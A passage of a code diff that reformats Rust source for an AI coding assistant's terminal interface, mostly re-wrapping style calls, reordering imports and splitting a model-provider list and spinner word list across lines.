-        Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(CLAURST_ACCENT)
+            .add_modifier(Modifier::BOLD),
     )]));
     for line in def.description.lines() {
         lines.push(Line::from(vec![Span::raw(format!(" {}", line))]));
@@ -707,7 +709,9 @@ fn render_agent_detail(def: &AgentDefinition, area: Rect, buf: &mut Buffer) {
     lines.push(Line::default());
     lines.push(Line::from(vec![Span::styled(
         " Prompt",
-        Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(CLAURST_ACCENT)
+            .add_modifier(Modifier::BOLD),
     )]));
     for line in def.instructions.lines().take(8) {
         lines.push(Line::from(vec![Span::styled(
@@ -763,7 +767,9 @@ fn render_agent_editor(state: &AgentsMenuState, area: Rect, buf: &mut Buffer) {
         Line::default(),
         Line::from(vec![Span::styled(
             " Prompt",
-            Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(CLAURST_ACCENT)
+                .add_modifier(Modifier::BOLD),
         )]),
     ];
 
@@ -808,18 +814,22 @@ fn render_editor_field(label: &str, value: &str, value_style: Style) -> Line<'st
         value.to_string()
     };
     Line::from(vec![
-        Span::styled(
-            format!(" {label:<10} "),
-            Style::default().fg(CLAURST_MUTED),
-        ),
+        Span::styled(format!(" {label:<10} "), Style::default().fg(CLAURST_MUTED)),
         Span::styled(display, value_style),
     ])
 }
 
 fn agent_list_row(title: String, meta: String, selected: bool, width: u16) -> Line<'static> {
-    let bg = if selected { CLAURST_ACCENT } else { CLAURST_PANEL_BG };
+    let bg = if selected {
+        CLAURST_ACCENT
+    } else {
+        CLAURST_PANEL_BG
+    };
     let title_style = if selected {
-        Style::default().fg(Color::White).bg(bg).add_modifier(Modifier::BOLD)
+        Style::default()
+            .fg(Color::White)
+            .bg(bg)
+            .add_modifier(Modifier::BOLD)
     } else {
         Style::default().fg(CLAURST_TEXT).bg(bg)
     };
@@ -879,7 +889,11 @@ pub fn render_coordinator_status(agents: &[AgentInfo], area: Rect, buf: &mut Buf
             height: 1,
         };
 
-        let prefix = if agent.is_coordinator { "● " } else { "  ○ " };
+        let prefix = if agent.is_coordinator {
+            "● "
+        } else {
+            "  ○ "
+        };
         let tool_str = agent
             .current_tool
             .as_deref()

--- a/src-rust/crates/tui/src/app.rs
+++ b/src-rust/crates/tui/src/app.rs
@@ -3,14 +3,12 @@
 use crate::bridge_state::BridgeConnectionState;
 use crate::context_viz::ContextVizState;
 use crate::dialog_select::{DialogSelectState, SelectItem};
-use crate::export_dialog::{ExportDialogState, ExportFormat};
-use crate::dialogs::PermissionRequest;
-use crate::diff_viewer::{DiffViewerState, build_turn_diff};
-use crate::model_picker::{EffortLevel, ModelPickerState, is_fast_mode_model};
-use crate::session_browser::SessionBrowserState;
-use crate::tasks_overlay::TasksOverlay;
 use crate::dialogs::McpApprovalDialogState;
+use crate::dialogs::PermissionRequest;
+use crate::diff_viewer::{build_turn_diff, DiffViewerState};
+use crate::export_dialog::{ExportDialogState, ExportFormat};
 use crate::mcp_view::{McpServerView, McpToolView, McpViewState, McpViewStatus};
+use crate::model_picker::{is_fast_mode_model, EffortLevel, ModelPickerState};
 use crate::notifications::{NotificationKind, NotificationQueue};
 use crate::overlays::{
     GlobalSearchState, HelpEntry, HelpOverlay, HistorySearchOverlay, MessageSelectorOverlay,
@@ -20,10 +18,15 @@ use crate::plugin_views::PluginHintBanner;
 use crate::privacy_screen::PrivacyScreen;
 use crate::prompt_input::{InputMode, PromptInputState, VimMode};
 use crate::render;
+use crate::session_browser::SessionBrowserState;
 use crate::settings_screen::SettingsScreen;
 use crate::stats_dialog::StatsDialogState;
+use crate::tasks_overlay::TasksOverlay;
 use crate::theme_screen::ThemeScreen;
-use crate::{agents_view::{AgentInfo, AgentStatus, AgentsMenuState, AgentsRoute}, diff_viewer::DiffPane};
+use crate::{
+    agents_view::{AgentInfo, AgentStatus, AgentsMenuState, AgentsRoute},
+    diff_viewer::DiffPane,
+};
 use claurst_core::config::{Config, Settings, Theme};
 use claurst_core::cost::CostTracker;
 use claurst_core::file_history::FileHistory;
@@ -66,7 +69,10 @@ const PROMPT_SLASH_COMMANDS: &[(&str, &str)] = &[
     ("help", "Show help"),
     ("hooks", "Browse configured hooks (read-only)"),
     ("init", "Initialize AGENTS.md for this project"),
-    ("insights", "Generate a session analysis report with conversation statistics"),
+    (
+        "insights",
+        "Generate a session analysis report with conversation statistics",
+    ),
     ("install-slack-app", "Install the Claurst Slack integration"),
     ("keybindings", "Show keybinding configuration"),
     ("login", "Log in to Claurst"),
@@ -92,14 +98,19 @@ const PROMPT_SLASH_COMMANDS: &[(&str, &str)] = &[
     ("stats", "Open token and cost stats"),
     ("survey", "Open session feedback survey"),
     ("theme", "Open the theme picker"),
-    ("ultrareview", "Run an exhaustive multi-dimensional code review"),
+    (
+        "ultrareview",
+        "Run an exhaustive multi-dimensional code review",
+    ),
     ("vim", "Toggle vim keybindings"),
     ("voice", "Toggle voice input mode"),
 ];
 
 fn help_command_category(name: &str) -> &'static str {
     match name {
-        "connect" | "model" | "providers" | "refresh" | "fast" | "effort" | "voice" => "Model & Provider",
+        "connect" | "model" | "providers" | "refresh" | "fast" | "effort" | "voice" => {
+            "Model & Provider"
+        }
         "changes" | "diff" | "review" | "rewind" | "export" | "copy" => "Review & History",
         "stats" | "cost" | "context" | "insights" | "heapdump" | "doctor" => "Diagnostics",
         "config" | "settings" | "theme" | "privacy" | "keybindings" | "hooks" | "mcp" => {
@@ -206,51 +217,321 @@ fn get_url_for_provider(id: &str) -> &'static str {
 
 fn provider_picker_items() -> Vec<SelectItem> {
     vec![
-        SelectItem { id: "openai".into(), title: "OpenAI".into(), description: "(API key)".into(), category: "Popular".into(), badge: None },
-        SelectItem { id: "openai-codex".into(), title: "OpenAI Codex".into(), description: "(ChatGPT Plus/Pro — browser login)".into(), category: "Popular".into(), badge: None },
-        SelectItem { id: "github-copilot".into(), title: "GitHub Copilot".into(), description: "(GitHub subscription or token)".into(), category: "Popular".into(), badge: None },
-        SelectItem { id: "google".into(), title: "Google".into(), description: "(API key)".into(), category: "Popular".into(), badge: None },
-        SelectItem { id: "anthropic".into(), title: "Anthropic".into(), description: "(API key)".into(), category: "Popular".into(), badge: None },
-        SelectItem { id: "openrouter".into(), title: "OpenRouter".into(), description: "100+ models with one key".into(), category: "Popular".into(), badge: None },
-        SelectItem { id: "vercel".into(), title: "Vercel AI Gateway".into(), description: "Gateway for AI SDK models".into(), category: "Popular".into(), badge: None },
-        SelectItem { id: "groq".into(), title: "Groq".into(), description: "Fast hosted inference".into(), category: "Popular".into(), badge: Some("FREE".into()) },
-        SelectItem { id: "ollama".into(), title: "Ollama".into(), description: "Run models locally".into(), category: "Popular".into(), badge: Some("LOCAL".into()) },
-        SelectItem { id: "cerebras".into(), title: "Cerebras".into(), description: "Fast hosted inference".into(), category: "Other".into(), badge: Some("FREE".into()) },
-        SelectItem { id: "sambanova".into(), title: "SambaNova".into(), description: "Fast hosted inference".into(), category: "Other".into(), badge: Some("FREE".into()) },
-        SelectItem { id: "lmstudio".into(), title: "LM Studio".into(), description: "Local model server".into(), category: "Other".into(), badge: Some("LOCAL".into()) },
-        SelectItem { id: "llamacpp".into(), title: "llama.cpp".into(), description: "Local inference server".into(), category: "Other".into(), badge: Some("LOCAL".into()) },
-        SelectItem { id: "deepseek".into(), title: "DeepSeek".into(), description: "Reasoning and coding models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "mistral".into(), title: "Mistral".into(), description: "Hosted Mistral models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "togetherai".into(), title: "Together AI".into(), description: "Open model hosting".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "perplexity".into(), title: "Perplexity".into(), description: "Search-augmented models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "cohere".into(), title: "Cohere".into(), description: "Command models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "xai".into(), title: "xAI".into(), description: "Grok models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "deepinfra".into(), title: "DeepInfra".into(), description: "Hosted open models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "azure".into(), title: "Azure OpenAI".into(), description: "Enterprise OpenAI deployments".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "amazon-bedrock".into(), title: "AWS Bedrock".into(), description: "Enterprise foundation models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "google-vertex".into(), title: "Google Vertex AI".into(), description: "Enterprise Google models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "sap-ai-core".into(), title: "SAP AI Core".into(), description: "Enterprise AI platform".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "gitlab".into(), title: "GitLab Duo".into(), description: "AI in GitLab".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "cloudflare-ai-gateway".into(), title: "Cloudflare AI Gateway".into(), description: "Gateway for multiple providers".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "cloudflare-workers-ai".into(), title: "Cloudflare Workers AI".into(), description: "Edge AI inference".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "helicone".into(), title: "Helicone".into(), description: "AI gateway and observability".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "huggingface".into(), title: "Hugging Face".into(), description: "Hosted community models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "nvidia".into(), title: "NVIDIA".into(), description: "Hosted NVIDIA models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "alibaba".into(), title: "Alibaba".into(), description: "Qwen and hosted models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "venice".into(), title: "Venice AI".into(), description: "Privacy-first AI".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "moonshotai".into(), title: "Moonshot AI".into(), description: "Hosted Moonshot models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "zhipuai".into(), title: "Zhipu AI".into(), description: "Hosted GLM models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "siliconflow".into(), title: "SiliconFlow".into(), description: "Hosted open models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "nebius".into(), title: "Nebius".into(), description: "Cloud inference".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "novita".into(), title: "Novita".into(), description: "Cloud inference".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "ovhcloud".into(), title: "OVHcloud".into(), description: "EU-hosted AI".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "scaleway".into(), title: "Scaleway".into(), description: "EU cloud AI".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "vultr".into(), title: "Vultr".into(), description: "Cloud inference".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "baseten".into(), title: "Baseten".into(), description: "Model serving".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "friendli".into(), title: "Friendli".into(), description: "Serverless inference".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "upstage".into(), title: "Upstage".into(), description: "Hosted Upstage models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "stepfun".into(), title: "StepFun".into(), description: "Hosted reasoning models".into(), category: "Other".into(), badge: None },
-        SelectItem { id: "fireworks".into(), title: "Fireworks AI".into(), description: "Fast inference".into(), category: "Other".into(), badge: None },
+        SelectItem {
+            id: "openai".into(),
+            title: "OpenAI".into(),
+            description: "(API key)".into(),
+            category: "Popular".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "openai-codex".into(),
+            title: "OpenAI Codex".into(),
+            description: "(ChatGPT Plus/Pro — browser login)".into(),
+            category: "Popular".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "github-copilot".into(),
+            title: "GitHub Copilot".into(),
+            description: "(GitHub subscription or token)".into(),
+            category: "Popular".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "google".into(),
+            title: "Google".into(),
+            description: "(API key)".into(),
+            category: "Popular".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "anthropic".into(),
+            title: "Anthropic".into(),
+            description: "(API key)".into(),
+            category: "Popular".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "openrouter".into(),
+            title: "OpenRouter".into(),
+            description: "100+ models with one key".into(),
+            category: "Popular".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "vercel".into(),
+            title: "Vercel AI Gateway".into(),
+            description: "Gateway for AI SDK models".into(),
+            category: "Popular".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "groq".into(),
+            title: "Groq".into(),
+            description: "Fast hosted inference".into(),
+            category: "Popular".into(),
+            badge: Some("FREE".into()),
+        },
+        SelectItem {
+            id: "ollama".into(),
+            title: "Ollama".into(),
+            description: "Run models locally".into(),
+            category: "Popular".into(),
+            badge: Some("LOCAL".into()),
+        },
+        SelectItem {
+            id: "cerebras".into(),
+            title: "Cerebras".into(),
+            description: "Fast hosted inference".into(),
+            category: "Other".into(),
+            badge: Some("FREE".into()),
+        },
+        SelectItem {
+            id: "sambanova".into(),
+            title: "SambaNova".into(),
+            description: "Fast hosted inference".into(),
+            category: "Other".into(),
+            badge: Some("FREE".into()),
+        },
+        SelectItem {
+            id: "lmstudio".into(),
+            title: "LM Studio".into(),
+            description: "Local model server".into(),
+            category: "Other".into(),
+            badge: Some("LOCAL".into()),
+        },
+        SelectItem {
+            id: "llamacpp".into(),
+            title: "llama.cpp".into(),
+            description: "Local inference server".into(),
+            category: "Other".into(),
+            badge: Some("LOCAL".into()),
+        },
+        SelectItem {
+            id: "deepseek".into(),
+            title: "DeepSeek".into(),
+            description: "Reasoning and coding models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "mistral".into(),
+            title: "Mistral".into(),
+            description: "Hosted Mistral models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "togetherai".into(),
+            title: "Together AI".into(),
+            description: "Open model hosting".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "perplexity".into(),
+            title: "Perplexity".into(),
+            description: "Search-augmented models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "cohere".into(),
+            title: "Cohere".into(),
+            description: "Command models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "xai".into(),
+            title: "xAI".into(),
+            description: "Grok models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "deepinfra".into(),
+            title: "DeepInfra".into(),
+            description: "Hosted open models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "azure".into(),
+            title: "Azure OpenAI".into(),
+            description: "Enterprise OpenAI deployments".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "amazon-bedrock".into(),
+            title: "AWS Bedrock".into(),
+            description: "Enterprise foundation models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "google-vertex".into(),
+            title: "Google Vertex AI".into(),
+            description: "Enterprise Google models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "sap-ai-core".into(),
+            title: "SAP AI Core".into(),
+            description: "Enterprise AI platform".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "gitlab".into(),
+            title: "GitLab Duo".into(),
+            description: "AI in GitLab".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "cloudflare-ai-gateway".into(),
+            title: "Cloudflare AI Gateway".into(),
+            description: "Gateway for multiple providers".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "cloudflare-workers-ai".into(),
+            title: "Cloudflare Workers AI".into(),
+            description: "Edge AI inference".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "helicone".into(),
+            title: "Helicone".into(),
+            description: "AI gateway and observability".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "huggingface".into(),
+            title: "Hugging Face".into(),
+            description: "Hosted community models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "nvidia".into(),
+            title: "NVIDIA".into(),
+            description: "Hosted NVIDIA models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "alibaba".into(),
+            title: "Alibaba".into(),
+            description: "Qwen and hosted models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "venice".into(),
+            title: "Venice AI".into(),
+            description: "Privacy-first AI".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "moonshotai".into(),
+            title: "Moonshot AI".into(),
+            description: "Hosted Moonshot models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "zhipuai".into(),
+            title: "Zhipu AI".into(),
+            description: "Hosted GLM models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "siliconflow".into(),
+            title: "SiliconFlow".into(),
+            description: "Hosted open models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "nebius".into(),
+            title: "Nebius".into(),
+            description: "Cloud inference".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "novita".into(),
+            title: "Novita".into(),
+            description: "Cloud inference".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "ovhcloud".into(),
+            title: "OVHcloud".into(),
+            description: "EU-hosted AI".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "scaleway".into(),
+            title: "Scaleway".into(),
+            description: "EU cloud AI".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "vultr".into(),
+            title: "Vultr".into(),
+            description: "Cloud inference".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "baseten".into(),
+            title: "Baseten".into(),
+            description: "Model serving".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "friendli".into(),
+            title: "Friendli".into(),
+            description: "Serverless inference".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "upstage".into(),
+            title: "Upstage".into(),
+            description: "Hosted Upstage models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "stepfun".into(),
+            title: "StepFun".into(),
+            description: "Hosted reasoning models".into(),
+            category: "Other".into(),
+            badge: None,
+        },
+        SelectItem {
+            id: "fireworks".into(),
+            title: "Fireworks AI".into(),
+            description: "Fast inference".into(),
+            category: "Other".into(),
+            badge: None,
+        },
     ]
 }
 
@@ -286,7 +567,10 @@ pub enum DisplayMessage {
     /// A real conversation turn.
     Conversation(Message),
     /// An injected system notice (e.g. compact boundary).
-    System { text: String, style: SystemMessageStyle },
+    System {
+        text: String,
+        style: SystemMessageStyle,
+    },
 }
 
 /// Context menu state: position and currently selected item index.
@@ -607,20 +891,17 @@ pub struct App {
     pub cursor_pos: usize,
 
     // ---- Scrollback / auto-scroll -----------------------------------------
-
     /// When `true`, the message pane follows the latest messages automatically.
     pub auto_scroll: bool,
     /// Count of messages that arrived while the user was scrolled up.
     pub new_messages_while_scrolled: usize,
 
     // ---- Token warning tracking -------------------------------------------
-
     /// Which threshold (0 = none, 80, 95, 100) was last notified so we only
     /// show each banner once.
     pub token_warning_threshold_shown: u8,
 
     // ---- Session timing ---------------------------------------------------
-
     /// Instant the session started (used for elapsed-time in the status bar).
     pub session_start: std::time::Instant,
     /// Current Rustle pose for rendering (updated each frame).
@@ -645,7 +926,6 @@ pub struct App {
     pub transcript_version: Cell<u64>,
 
     // ---- New overlay / notification fields --------------------------------
-
     /// Full-screen help overlay (? / F1).
     pub help_overlay: HelpOverlay,
     /// Ctrl+R history search overlay.
@@ -676,7 +956,6 @@ pub struct App {
     pub current_turn: Option<Arc<std::sync::atomic::AtomicUsize>>,
 
     // ---- Visual mode indicators -------------------------------------------
-
     /// Plan mode — input border turns blue, [PLAN] shown in status bar.
     pub plan_mode: bool,
     /// "While you were away" summary text shown on the welcome screen.
@@ -685,7 +964,6 @@ pub struct App {
     pub stall_start: Option<std::time::Instant>,
 
     // ---- Settings / theme / privacy screens --------------------------------
-
     /// Full-screen tabbed settings screen (/config, /settings).
     pub settings_screen: SettingsScreen,
     /// Theme picker overlay (/theme).
@@ -715,7 +993,8 @@ pub struct App {
     /// Startup error dialog for malformed settings.json or AGENTS.md.
     pub invalid_config_dialog: crate::invalid_config_dialog::InvalidConfigDialogState,
     /// Memory update notification banner.
-    pub memory_update_notification: crate::memory_update_notification::MemoryUpdateNotificationState,
+    pub memory_update_notification:
+        crate::memory_update_notification::MemoryUpdateNotificationState,
     /// MCP elicitation dialog (form requested by an MCP server).
     pub elicitation: crate::elicitation_dialog::ElicitationDialogState,
     /// Model picker overlay (/model command).
@@ -791,7 +1070,6 @@ pub struct App {
     pub auto_compact_running: bool,
 
     // ---- Voice hold-to-talk ------------------------------------------------
-
     /// The global voice recorder, Some when voice is enabled in config.
     pub voice_recorder: Option<Arc<Mutex<claurst_core::voice::VoiceRecorder>>>,
     /// True while recording is active (Alt+V toggled on).
@@ -805,7 +1083,6 @@ pub struct App {
         Option<tokio::sync::mpsc::Receiver<Result<Vec<crate::model_picker::ModelEntry>, ()>>>,
 
     // ---- Context window & rate limit info ----------------------------------
-
     /// Total context window size for the current model (tokens).
     pub context_window_size: u64,
     /// How many tokens are currently used in the context window.
@@ -879,37 +1156,191 @@ pub struct App {
 }
 
 const SPINNER_VERBS: &[&str] = &[
-    "Accomplishing", "Actioning", "Actualizing", "Architecting", "Baking", "Beaming",
-    "Beboppin'", "Befuddling", "Billowing", "Blanching", "Bloviating", "Boogieing",
-    "Boondoggling", "Booping", "Bootstrapping", "Brewing", "Bunning", "Burrowing",
-    "Calculating", "Canoodling", "Caramelizing", "Cascading", "Catapulting", "Cerebrating",
-    "Channeling", "Choreographing", "Churning", "Clauding", "Coalescing", "Cogitating",
-    "Combobulating", "Composing", "Computing", "Concocting", "Considering", "Contemplating",
-    "Cooking", "Crafting", "Creating", "Crunching", "Crystallizing", "Cultivating",
-    "Deciphering", "Deliberating", "Determining", "Dilly-dallying", "Discombobulating",
-    "Doing", "Doodling", "Drizzling", "Ebbing", "Effecting", "Elucidating", "Embellishing",
-    "Enchanting", "Envisioning", "Evaporating", "Fermenting", "Fiddle-faddling", "Finagling",
-    "Flambéing", "Flibbertigibbeting", "Flowing", "Flummoxing", "Fluttering", "Forging",
-    "Forming", "Frolicking", "Frosting", "Gallivanting", "Galloping", "Garnishing",
-    "Generating", "Gesticulating", "Germinating", "Gitifying", "Grooving", "Gusting",
-    "Harmonizing", "Hashing", "Hatching", "Herding", "Honking", "Hullaballooing",
-    "Hyperspacing", "Ideating", "Imagining", "Improvising", "Incubating", "Inferring",
-    "Infusing", "Ionizing", "Jitterbugging", "Julienning", "Kneading", "Leavening",
-    "Levitating", "Lollygagging", "Manifesting", "Marinating", "Meandering", "Metamorphosing",
-    "Misting", "Moonwalking", "Moseying", "Mulling", "Mustering", "Musing", "Nebulizing",
-    "Nesting", "Newspapering", "Noodling", "Nucleating", "Orbiting", "Orchestrating",
-    "Osmosing", "Perambulating", "Percolating", "Perusing", "Philosophising",
-    "Photosynthesizing", "Pollinating", "Pondering", "Pontificating", "Pouncing",
-    "Precipitating", "Prestidigitating", "Processing", "Proofing", "Propagating", "Puttering",
-    "Puzzling", "Quantumizing", "Razzle-dazzling", "Razzmatazzing", "Recombobulating",
-    "Reticulating", "Roosting", "Ruminating", "Sautéing", "Scampering", "Schlepping",
-    "Scurrying", "Seasoning", "Shenaniganing", "Shimmying", "Simmering", "Skedaddling",
-    "Sketching", "Slithering", "Smooshing", "Sock-hopping", "Spelunking", "Spinning",
-    "Sprouting", "Stewing", "Sublimating", "Swirling", "Swooping", "Symbioting",
-    "Synthesizing", "Tempering", "Thinking", "Thundering", "Tinkering", "Tomfoolering",
-    "Topsy-turvying", "Transfiguring", "Transmuting", "Twisting", "Undulating", "Unfurling",
-    "Unravelling", "Vibing", "Waddling", "Wandering", "Warping", "Whatchamacalliting",
-    "Whirlpooling", "Whirring", "Whisking", "Wibbling", "Working", "Wrangling", "Zesting",
+    "Accomplishing",
+    "Actioning",
+    "Actualizing",
+    "Architecting",
+    "Baking",
+    "Beaming",
+    "Beboppin'",
+    "Befuddling",
+    "Billowing",
+    "Blanching",
+    "Bloviating",
+    "Boogieing",
+    "Boondoggling",
+    "Booping",
+    "Bootstrapping",
+    "Brewing",
+    "Bunning",
+    "Burrowing",
+    "Calculating",
+    "Canoodling",
+    "Caramelizing",
+    "Cascading",
+    "Catapulting",
+    "Cerebrating",
+    "Channeling",
+    "Choreographing",
+    "Churning",
+    "Clauding",
+    "Coalescing",
+    "Cogitating",
+    "Combobulating",
+    "Composing",
+    "Computing",
+    "Concocting",
+    "Considering",
+    "Contemplating",
+    "Cooking",
+    "Crafting",
+    "Creating",
+    "Crunching",
+    "Crystallizing",
+    "Cultivating",
+    "Deciphering",
+    "Deliberating",
+    "Determining",
+    "Dilly-dallying",
+    "Discombobulating",
+    "Doing",
+    "Doodling",
+    "Drizzling",
+    "Ebbing",
+    "Effecting",
+    "Elucidating",
+    "Embellishing",
+    "Enchanting",
+    "Envisioning",
+    "Evaporating",
+    "Fermenting",
+    "Fiddle-faddling",
+    "Finagling",
+    "Flambéing",
+    "Flibbertigibbeting",
+    "Flowing",
+    "Flummoxing",
+    "Fluttering",
+    "Forging",
+    "Forming",
+    "Frolicking",
+    "Frosting",
+    "Gallivanting",
+    "Galloping",
+    "Garnishing",
+    "Generating",
+    "Gesticulating",
+    "Germinating",
+    "Gitifying",
+    "Grooving",
+    "Gusting",
+    "Harmonizing",
+    "Hashing",
+    "Hatching",
+    "Herding",
+    "Honking",
+    "Hullaballooing",
+    "Hyperspacing",
+    "Ideating",
+    "Imagining",
+    "Improvising",
+    "Incubating",
+    "Inferring",
+    "Infusing",
+    "Ionizing",
+    "Jitterbugging",
+    "Julienning",
+    "Kneading",
+    "Leavening",
+    "Levitating",
+    "Lollygagging",
+    "Manifesting",
+    "Marinating",
+    "Meandering",
+    "Metamorphosing",
+    "Misting",
+    "Moonwalking",
+    "Moseying",
+    "Mulling",
+    "Mustering",
+    "Musing",
+    "Nebulizing",
+    "Nesting",
+    "Newspapering",
+    "Noodling",
+    "Nucleating",
+    "Orbiting",
+    "Orchestrating",
+    "Osmosing",
+    "Perambulating",
+    "Percolating",
+    "Perusing",
+    "Philosophising",
+    "Photosynthesizing",
+    "Pollinating",
+    "Pondering",
+    "Pontificating",
+    "Pouncing",
+    "Precipitating",
+    "Prestidigitating",
+    "Processing",
+    "Proofing",
+    "Propagating",
+    "Puttering",
+    "Puzzling",
+    "Quantumizing",
+    "Razzle-dazzling",
+    "Razzmatazzing",
+    "Recombobulating",
+    "Reticulating",
+    "Roosting",
+    "Ruminating",
+    "Sautéing",
+    "Scampering",
+    "Schlepping",
+    "Scurrying",
+    "Seasoning",
+    "Shenaniganing",
+    "Shimmying",
+    "Simmering",
+    "Skedaddling",
+    "Sketching",
+    "Slithering",
+    "Smooshing",
+    "Sock-hopping",
+    "Spelunking",
+    "Spinning",
+    "Sprouting",
+    "Stewing",
+    "Sublimating",
+    "Swirling",
+    "Swooping",
+    "Symbioting",
+    "Synthesizing",
+    "Tempering",
+    "Thinking",
+    "Thundering",
+    "Tinkering",
+    "Tomfoolering",
+    "Topsy-turvying",
+    "Transfiguring",
+    "Transmuting",
+    "Twisting",
+    "Undulating",
+    "Unfurling",
+    "Unravelling",
+    "Vibing",
+    "Waddling",
+    "Wandering",
+    "Warping",
+    "Whatchamacalliting",
+    "Whirlpooling",
+    "Whirring",
+    "Whisking",
+    "Wibbling",
+    "Working",
+    "Wrangling",
+    "Zesting",
     "Zigzagging",
 ];
 
@@ -920,8 +1351,15 @@ fn sample_spinner_verb(seed: usize) -> &'static str {
 /// Past-tense verbs shown in the status row after a turn completes.
 /// Mirrors `TURN_COMPLETION_VERBS` from `src/constants/turnCompletionVerbs.ts`.
 const TURN_COMPLETION_VERBS: &[&str] = &[
-    "Baked", "Brewed", "Churned", "Cogitated", "Cooked", "Crunched",
-    "Pondered", "Processed", "Worked",
+    "Baked",
+    "Brewed",
+    "Churned",
+    "Cogitated",
+    "Cooked",
+    "Crunched",
+    "Pondered",
+    "Processed",
+    "Worked",
 ];
 
 fn sample_completion_verb(seed: usize) -> &'static str {
@@ -988,17 +1426,26 @@ The goal: sound like Rocky while being genuinely helpful. Rocky is smart. \
 Rocky gives complete technical answers. Rocky just uses fewer unnecessary words.";
 
     match level {
-        "lite" => format!("{}\n\nLight touch. Mostly normal English but drop pleasantries, \
-occasionally drop an article, use 'question?' on one or two questions. Subtle.", base),
-        "ultra" => format!("{}\n\nStrong Rocky voice. Drop most articles and auxiliaries. \
+        "lite" => format!(
+            "{}\n\nLight touch. Mostly normal English but drop pleasantries, \
+occasionally drop an article, use 'question?' on one or two questions. Subtle.",
+            base
+        ),
+        "ultra" => format!(
+            "{}\n\nStrong Rocky voice. Drop most articles and auxiliaries. \
 Use 'big' liberally. Triple emphasis ('good good good', 'amaze amaze amaze') \
 2-3 times per response. Occasionally comment on human code patterns as fascinating. \
-Still give complete, correct technical answers.", base),
-        _ => format!("{}\n\nBalanced Rocky. Drop articles naturally, use Rocky vocabulary \
+Still give complete, correct technical answers.",
+            base
+        ),
+        _ => format!(
+            "{}\n\nBalanced Rocky. Drop articles naturally, use Rocky vocabulary \
 ('big', 'no can', 'question?'), triple emphasis once or twice when warranted. \
 Full technical accuracy.\n\
 Example: 'Borrow checker found mismatch. Immutable ref still live when you take mutable. \
